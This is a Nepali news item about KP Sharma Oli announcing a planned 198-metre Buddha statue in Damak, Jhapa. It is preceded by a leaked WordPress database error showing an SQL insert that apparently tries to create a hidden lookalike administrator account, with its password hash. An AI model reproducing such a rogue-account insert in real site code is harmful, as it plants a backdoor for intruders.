WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsrwSX6AMEwIlAJ0qBGySXpQvQwlCW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-21 05:59:40', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २९ –
नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले झापाको दमकमा निर्माण हुन लागेको बुद्धको प्रतिमा विश्वकै अग्लो हुने बताएका छन् ।
बुद्ध मूर्ति तथा बुद्ध पार्क निर्माणसम्बन्धी परियोजनाको शनिबार काठमाडौंमा उद्घाटन गर्दै एमाले अध्यक्ष ओलीले निर्माण गर्न लागिएको बुद्धको मूर्तिले विश्व शान्तिको सन्देश दिने विश्वास व्यक्त गरे ।
उनले पर्यटकीय दृष्टिकोणले पनि बुद्धको प्रतिमा निर्माण महत्वपूर्ण हुने भन्दै यसले नेपालको एकतामा पनि सहयोग पुग्ने विश्वास व्यक्त गरे ।
नेपालको संस्कृतिअनुसार दमकमा निर्माण हुने विश्वकै अग्लो बुद्ध मूर्ति १ सय ९८ मिटर अग्लो हुने छ ।
दमक नगरपालिकाका कार्यकारी अधिकृत युवराज दाहालले ३६ विगाहा क्षेत्रफलमा निर्माण गर्न लागिएको विराट बौद्ध प्रतिमाको काम चाँडै सुरु हुने जानकारी दिए ।